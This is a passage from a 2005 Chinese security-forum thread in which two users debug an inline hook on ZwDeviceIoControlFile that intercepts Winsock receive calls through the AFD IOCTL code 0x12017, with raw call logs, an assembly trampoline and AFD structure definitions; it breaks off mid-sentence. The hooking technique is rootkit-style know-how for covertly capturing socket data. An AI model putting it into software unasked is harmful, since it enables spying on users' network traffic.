ntdevioctrl:7d0 0 0 f28764 f28764 12083 104fcc8 44 1302b0 840
invoke result:103
ntdevioctrl:8d0 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f288bc f288bc 12083 104fcc8 44 130d60 840
invoke result:103
ntdevioctrl:8d4 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f28a14 f28a14 12083 104fcc8 44 131700 840
invoke result:103
ntdevioctrl:8d8 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f28b6c f28b6c 12083 104fcc8 44 1320a0 840
invoke result:103
ntdevioctrl:8dc 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f28cc4 f28cc4 12083 104fcc8 44 132a40 840
invoke result:103
ntdevioctrl:8e0 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f28e1c f28e1c 12083 104fcc8 44 1333e0 840
invoke result:103
ntdevioctrl:8e4 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f28f74 f28f74 12083 104fcc8 44 133d80 840
invoke result:103
ntdevioctrl:8e8 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f290cc f290cc 12083 104fcc8 44 134720 840
invoke result:103
ntdevioctrl:8ec 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f29224 f29224 12083 104fcc8 44 1350c0 840
invoke result:103
ntdevioctrl:8f0 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2937c f2937c 12083 104fcc8 44 135a60 840
invoke result:103
ntdevioctrl:8f4 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f294d4 f294d4 12083 104fcc8 44 136400 840
invoke result:103
ntdevioctrl:8f8 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2962c f2962c 12083 104fcc8 44 136da0 840
invoke result:103
ntdevioctrl:8fc 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f29784 f29784 12083 104fcc8 44 137740 840
invoke result:103
ntdevioctrl:900 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f298dc f298dc 12083 104fcc8 44 1380e0 840
invoke result:103
ntdevioctrl:904 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f29a34 f29a34 12083 104fcc8 44 138a80 840
invoke result:103
ntdevioctrl:908 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f29b8c f29b8c 12083 104fcc8 44 139420 840
invoke result:103
ntdevioctrl:90c 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f29ce4 f29ce4 12083 104fcc8 44 139dc0 840
invoke result:103
ntdevioctrl:910 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f29e3c f29e3c 12083 104fcc8 44 13a760 840
invoke result:103
ntdevioctrl:914 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f29f94 f29f94 12083 104fcc8 44 13b100 840
invoke result:103
ntdevioctrl:918 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2a0ec f2a0ec 12083 104fcc8 44 13baa0 840
invoke result:103
ntdevioctrl:91c 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2a244 f2a244 12083 104fcc8 44 13c440 840
invoke result:103
ntdevioctrl:920 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2a39c f2a39c 12083 104fcc8 44 13cde0 840
invoke result:103
ntdevioctrl:924 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2a4f4 f2a4f4 12083 104fcc8 44 13d780 840
invoke result:103
ntdevioctrl:928 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2a64c f2a64c 12083 104fcc8 44 13e120 840
invoke result:103
ntdevioctrl:92c 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2a7a4 f2a7a4 12083 104fcc8 44 13eac0 840
invoke result:103
ntdevioctrl:930 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2a8fc f2a8fc 12083 104fcc8 44 13f460 840
invoke result:103
ntdevioctrl:934 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2aa54 f2aa54 12083 104fcc8 44 13fe00 840
invoke result:103
ntdevioctrl:938 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2abac f2abac 12083 104fcc8 44 1407a0 840
invoke result:103
ntdevioctrl:93c 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2ad04 f2ad04 12083 104fcc8 44 141140 840
invoke result:103
ntdevioctrl:940 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2ae5c f2ae5c 12083 104fcc8 44 141ae0 840
invoke result:103
ntdevioctrl:944 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2afb4 f2afb4 12083 104fcc8 44 142480 840
invoke result:103
ntdevioctrl:948 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2b10c f2b10c 12083 104fcc8 44 142e20 840
invoke result:103
ntdevioctrl:94c 8ac 0 0 104fd48 12047 104fc44 d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f2b264 f2b264 12083 104fcc8 44 1437c0 840
invoke result:103
ntdevioctrl:800 0 0 f25f14 f25f14 1201f 104f9f0 10 0 0
invoke result:0
ntdevioctrl:800 8ac 0 0 104fd90 12017 104fd80 10 0 0
invoke result:103
ntdevioctrl:800 8ac 0 0 104fb9c 12037 104fbac 4 104fba4 8
invoke result:0
ntdevioctrl:800 8ac 0 0 104fba4 12037 104fbb4 4 104fbac 8
invoke result:0
ntdevioctrl:800 8ac 0 0 104fbbc 12047 104fab8 d4 0 0
invoke result:0
ntdevioctrl:800 8ac 0 0 104fbd8 12047 104fad4 d4 0 0
invoke result:0
ntdevioctrl:800 8ac 0 0 104fc88 1202b 104fc78 10 0 0
invoke result:0
ntdevioctrl:800 8ac 0 0 104fbe0 12037 104fbf0 4 104fbe8 8
invoke result:0
ntdevioctrl:800 8ac 0 0 104fd40 12047 104fc3c d4 0 0
invoke result:0
ntdevioctrl:7d0 0 0 f25f14 f25f14 12083 104fcc0 44 111098 840
invoke result:103
从中并没有 0x00012017做第六个参数的。
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day
| 发表于:2005-03-15 17:00 |
发帖: 3234
积分: 11
注册: 2001-09-20
00012017是recv函数最终使用的,完成端口是不是也用这个我就不能确定了,等有空了我再找个完成端口的应用来看看。
NtDeviceIoControlFile调用的频度远比你想象的要多,你这样全部打印很可能会漏掉关键的那个数据接收的调用。
---
我寒不能怨人傻
人傻不能怨政府
| 发表于:2005-03-15 17:01 |
发帖: 317
积分: 0
注册: 2004-01-22
status = NtDeviceIoControlFile(
(HANDLE)Handle,
event,
apcRoutine,
apcContext,
ioStatusBlock,
IOCTL_AFD_RECEIVE,
&recvInfo,
sizeof(recvInfo),
NULL,
0
);
因为我们已知recv调用时最后两个参数为0,就加上这个条件做了个过滤。奇怪的这次出现了 0x00012017:
ntdevioctrl:964 0 0 f2b264 f2b264 1201f 104f9f0 10 0 0
invoke result:0
ntdevioctrl:964 14c 0 0 104fd90 12017 104fd80 10 0 0
invoke result:103
ntdevioctrl:964 14c 0 0 104fbbc 12047 104fab8 d4 0 0
invoke result:0
ntdevioctrl:964 14c 0 0 104fbd8 12047 104fad4 d4 0 0
invoke result:0
ntdevioctrl:964 14c 0 0 104fc88 1202b 104fc78 10 0 0
invoke result:0
ntdevioctrl:964 14c 0 0 104fd40 12047 104fc3c d4 0 0
invoke result:0
疑惑中。
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day
| 发表于:2005-03-15 17:05 |
发帖: 3234
积分: 11
注册: 2001-09-20
NtDeviceIoControlFile是被循环调用的,其调用频度远超过Windows 控制台子系统屏幕输出的速度,你如果不加过滤条件,基本上得到的都是那些循环的输出。
你以0x00012017作为过滤条件。然后打印*(char *)(*(DWORD *)recvInfo + sizeof(DWORD)) 不就明白这个值是否正确了么。
---
我寒不能怨人傻
人傻不能怨政府
| 发表于:2005-03-15 17:09 |
发帖: 317
积分: 0
注册: 2004-01-22
不是控制台,我是log到文件。
oriZwDeviceIoControlFile://offset:0x103
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
//15个nop留下应该够了
__emit 0xe9
__emit 0
__emit 0
__emit 0
__emit 0
//跳回原来的API后面部分
myZwDeviceIoControlFile://
//int 3
push ebp
mov ebp,esp
push [ebp+0x2c]
push [ebp+0x28]
push [ebp+0x24]
push [ebp+0x20]
push [ebp+0x1c]
push [ebp+0x18]
push [ebp+0x14]
push [ebp+0x10]
push [ebp+0x0c]
push [ebp+0x08]
call dbglog10
push [ebp+0x2c]
push [ebp+0x28]
push [ebp+0x24]
push [ebp+0x20]
push [ebp+0x1c]
push [ebp+0x18]
push [ebp+0x14]
push [ebp+0x10]
push [ebp+0x0c]
push [ebp+0x08]
call oriZwDeviceIoControlFile
push eax
push eax
call dbglog01
pop eax
pop ebp
ret 28h
必须等log结束,ntdevioctrl才能继续执行
我log的结果不全,log的速度没有ntdevioctrl调用的速度快,应该不会吧
baiyuanfan 编辑于 2005-03-15 17:11
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day
| 发表于:2005-03-15 17:24 |
发帖: 3234
积分: 11
注册: 2001-09-20
计算机的美好之处在于0就是0,1就是1,铁板钉钉。说什么都没意义,你把0x00012017的时候缓冲区里面的数据打印出来就清楚了。
---
我寒不能怨人傻
人傻不能怨政府
| 发表于:2005-03-15 17:32 |
发帖: 317
积分: 0
注册: 2004-01-22
我到是觉得12047很多,比较有可能,呵呵。
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day
| 发表于:2005-03-15 17:34 |
发帖: 3234
积分: 11
注册: 2001-09-20
| 引用 (baiyuanfan @ 2005-03-15 17:32) |
| 我到是觉得12047很多,比较有可能,呵呵。 |
你是准备继续喋喋不休下去呢,还是写个代码测试一下?
---
我寒不能怨人傻
人傻不能怨政府
| 发表于:2005-03-15 17:36 |
发帖: 317
积分: 0
注册: 2004-01-22
写了,测了。
ntdevioctrl:94c 8ac 0 0 104fd90 12017 104fd80 10 0 0
invoke result:103
唯一的一个12017调用返回是pending!老大。
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day
| 发表于:2005-03-15 17:46 |
发帖: 3234
积分: 11
注册: 2001-09-20
我也郁闷了。这段东西给你参考一下:
#define AFD_RECEIVE 5
#define METHOD_NEITHER 3
#define FILE_DEVICE_NETWORK 0x00000012
#define FSCTL_AFD_BASE FILE_DEVICE_NETWORK
#define _AFD_CONTROL_CODE(request,method) /
((FSCTL_AFD_BASE)<<12 | (request<<2) | method)
#define IOCTL_AFD_RECEIVE _AFD_CONTROL_CODE( AFD_RECEIVE, METHOD_NEITHER )
typedef struct _WSABUF {
ULONG len;
PCHAR buf;
} WSABUF, *LPWSABUF;
typedef struct _AFD_RECV_INFO {
LPWSABUF BufferArray;
ULONG BufferCount;
ULONG AfdFlags;
ULONG TdiFlags;
} AFD_RECV_INFO, *PAFD_RECV_INFO;
typedef struct _IO_STATUS_BLOCK
{
union
{
NTSTATUS Status;
PVOID Pointer;
};
ULONG_PTR Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
typedef VOID (NTAPI *PIO_APC_ROUTINE)
(
IN PVOID ApcContext,
IN PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG Reserved
);
---
我寒不能怨人傻
人傻不能怨政府
| 发表于:2005-03-15 17:52 |
发帖: 317
积分: 0
注册: 2004-01-22
这个是NT原代码??
---
PowerfulRootkitExploit @SteelKernelGroup 各类后门,木马,Exp,0day
| 发表于:2005-03-16 11:22 |
发帖: 3234
积分: 11
注册: 2001-09-20
用上面的宏,printf ("%.8x",IOCTL_AFD_RECEIVE)出来的就是00012017,和我调出来的结果是一致的。我实际测试也确实得到了接收到的数据。
---
我寒不能怨人傻
人傻不能怨政府
| 发表于:2005-03-16 15:46 |
发帖: 317
积分: 0
注册: 2004-01-22
加过滤条件第六个参